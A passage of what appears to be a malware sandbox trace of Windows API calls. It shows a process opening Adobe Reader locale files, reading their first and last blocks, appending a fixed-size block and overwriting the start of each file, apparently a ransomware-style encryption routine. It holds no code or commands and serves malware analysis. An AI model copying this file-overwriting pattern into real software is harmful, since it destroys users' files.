lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.428] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1800 [0085.428] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.428] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.428] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.429] CloseHandle (hObject=0x1fc) returned 1 [0085.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Checkers.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\checkers.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.431] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.431] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1d600 [0085.431] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.431] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.432] ReleaseMutex (hMutex=0x168) returned 1 [0085.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SVE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SVE", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.SVE", lpUsedDefaultChar=0x0) returned 12 [0085.432] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.438] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c600 [0085.438] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.440] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c600 [0085.441] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.441] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.441] WriteFile (in: hFile=0x1fc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.441] CloseHandle (hObject=0x1fc) returned 1 [0085.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\pddom.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\pddom.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.443] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.443] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2a00 [0085.443] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.443] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.443] ReleaseMutex (hMutex=0x168) returned 1 [0085.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.SVE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.SVE", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.SVE", lpUsedDefaultChar=0x0) returned 9 [0085.444] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.451] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0085.451] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0085.452] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.452] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.453] CloseHandle (hObject=0x1fc) returned 1 [0085.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.462] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.462] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8d1f [0085.462] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.463] ReleaseMutex (hMutex=0x168) returned 1 [0085.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.463] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.472] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7d1f [0085.472] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.473] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7d1f [0085.473] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.474] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.474] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.474] CloseHandle (hObject=0x1fc) returned 1 [0085.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Annots.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\annots.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.475] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.476] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x75000 [0085.476] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.476] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.476] ReleaseMutex (hMutex=0x168) returned 1 [0085.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.TUR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.TUR", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.TUR", lpUsedDefaultChar=0x0) returned 10 [0085.476] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.484] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x74000 [0085.485] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.781] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x74000 [0085.781] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.782] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.782] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.782] CloseHandle (hObject=0x1fc) returned 1 [0085.803] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\MakeAccessible.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\makeaccessible.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.812] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.812] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11c00 [0085.812] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.812] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.812] ReleaseMutex (hMutex=0x168) returned 1 [0085.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.TUR", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.TUR", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.TUR", lpUsedDefaultChar=0x0) returned 18 [0085.813] ReadFile (in: hFile=0x1fc, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.822] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10c00 [0085.823] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.823] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10c00 [0085.823] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.824] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.824] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.825] CloseHandle (hObject=0x1fc) returned 1 [0085.825] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Search.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\search.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.826] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.826] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5600 [0085.826] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.826] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.826] ReleaseMutex (hMutex=0x168) returned 1 [0085.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.TUR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.TUR", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.TUR", lpUsedDefaultChar=0x0) returned 10 [0085.827] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.836] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4600 [0085.836] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.837] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4600 [0085.837] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.837] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.837] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.837] CloseHandle (hObject=0x1fc) returned 1 [0085.838] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Acroform.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\acroform.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.838] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.838] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x65600 [0085.839] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.839] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.839] ReleaseMutex (hMutex=0x168) returned 1 [0085.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.UKR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.UKR", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.UKR", lpUsedDefaultChar=0x0) returned 12 [0085.839] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.842] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x64600 [0085.842] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.849] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x64600 [0085.849] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.850] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.850] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.850] CloseHandle (hObject=0x1fc) returned 1 [0085.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\EScript.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\escript.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.851] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.851] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa000 [0085.851] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 